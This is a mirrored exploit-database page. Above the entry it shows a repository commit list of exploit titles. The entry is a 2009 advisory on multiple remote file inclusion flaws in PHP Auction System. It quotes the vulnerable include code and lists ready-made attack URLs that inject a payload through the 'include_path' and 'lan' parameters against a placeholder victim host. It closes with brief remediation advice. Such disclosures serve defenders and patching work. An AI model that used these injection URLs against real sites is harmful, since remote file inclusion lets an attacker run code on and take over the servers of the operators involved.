exploit-db-mirror/platforms/php/webapps/7678.txt
Offensive Security 477bcbdcc0 DB: 2016-03-17
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

118 lines
7.1 KiB
Text
Executable file

[»]=======================================================================================================[_][-][X]
[»] [»]
[»] PHPAuctionSystem Multiple Remote File Inclusion Vulnerability [»]
[»] [»]
[»] ======= ------d-------m------ ==== ==== [»]
[»] || = | |(o o)| | || || || [»]
[»] || = ||(~)|| || || [»]
[»] ======= /|\ || || [»]
[»]=============================================================================================================[»]
[»] Author : ~darkmasking~ [»]
[»] Date : January, 6th 2009 [»]
[»] Web : https://www.idsafeshield.com [»]
[»] Contact : support[at]idsafeshield[dot]com [»]
[»] Critical Level : Dangerous [»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»] Affected software description : [»]
[»] Software : PHP Auction System [»]
[»] Vendor : http://www.phpauctions.info/ [»]
[»] Price : $59.99 [»]
[»]=============================================================================================================[»]
[»] [»]
[»] [~] Vulnerable file [»]
[»] [»]
[»] [+] all file below is affected by "include_path" parameter [»]
[»] [»]
[»] ./includes/settings.inc.php [»]
[»] $password_file = $include_path."passwd.inc.php"; [»]
[»] include($password_file); [»]
[»] include $include_path."fonts.inc.php"; [»]
[»] include $include_path."fontsize.inc.php"; [»]
[»] include($include_path."currency.inc.php"); [»]
[»] include($include_path."errors.inc.php"); [»]
[»] include($include_path."https.inc.php"); [»]
[»] [»]
[»] ./includes/auction_confirmation.inc.php [»]
[»] require("./includes/messages.inc.php"); [»]
[»] [»]
[»] ./includes/converter.inc.php [»]
[»] include($include_path."nusoap.php"); [»]
[»] [»]
[»] ./includes/messages.inc.php [»]
[»] require($include_path.'messages.'.$language.'.inc.php'); [»]
[»] [»]
[»] ./includes/stats.inc.php [»]
[»] include $prefix."includes/useragent.inc.php"; [»]
[»] include $prefix."includes/domains.inc.php"; [»]
[»] [»]
[»] ./includes/useragent.inc.php [»]
[»] include $prefix."includes/browsers.inc.php"; [»]
[»] include $prefix."includes/platforms.inc.php"; [»]
[»] [»]
[»] ./includes/user_confirmation.inc.php [»]
[»] require("./includes/messages.inc.php"); [»]
[»] [»]
[»] [»]
[»] [+] All file below is affected by "lan" parameter [»]
[»] [»]
[»] ./browse.php [»]
[»] ./search.php [»]
[»] if(!empty($_GET['lan'])) { [»]
[»] $language = $lan; [»]
[»] $_SESSION['language'] = $language; [»]
[»] [»]
[»] #// Set language cookie [»]
[»] setcookie("USERLANGUAGE",$lan,time()+31536000,"/"); [»]
[»] } elseif(empty($_SESSION['language']) && !isset($_COOKIE['USERLANGUAGE'])) { [»]
[»] $language = $SETTINGS['defaultlanguage']; [»]
[»] $_SESSION['language'] = $language; [»]
[»] [»]
[»] #// Set language cookie [»]
[»] setcookie("USERLANGUAGE",$language,time()+31536000); [»]
[»] } elseif(isset($_COOKIE['USERLANGUAGE'])) { [»]
[»] $language = $_COOKIE['USERLANGUAGE']; [»]
[»] } [»]
[»] [»]
[»] require($include_path.'messages.'.$language.'.inc.php'); [»]
[»] [»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] Exploit [»]
[»] [»]
[»] [+] "include_path" parameter [»]
[»] [»]
[»] http://www.darkvictims.com/[path]/includes/settings.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/auction_confirmation.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/converter.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/messages.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/stats.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/useragent.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/user_confirmation.inc.php?include_path=[darkcode] [»]
[»] [»]
[»] [»]
[»] [+] "lan" parameter [»]
[»] [»]
[»] http://www.darkvictims.com/[path]/browse.php?lan=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/search.php?lan=[darkcode] [»]
[»] [»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] How to fix this vulnerability [»]
[»] [»]
[»] Edit the source code to ensure that input is properly validated. Where is possible, [»]
[»] it is recommended to make a list of accepted filenames and restrict the input to that list. [»]
[»] [»]
[»] For PHP, the option allow_url_fopen would normally allow a programmer to open, [»]
[»] include or otherwise use a remote file using a URL rather than a local file path. [»]
[»] It is recommended to disable this option from php.ini. [»]
[»] [»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] Greetz [»]
[»] [»]
[»] BUAT DIRI SENDIRI AJA [ Sorry Bro belum dapat teman :) ] [»]
[»] [»]
[»] [»]
[»]=============================================================================================================[»]
# milw0rm.com [2009-01-06]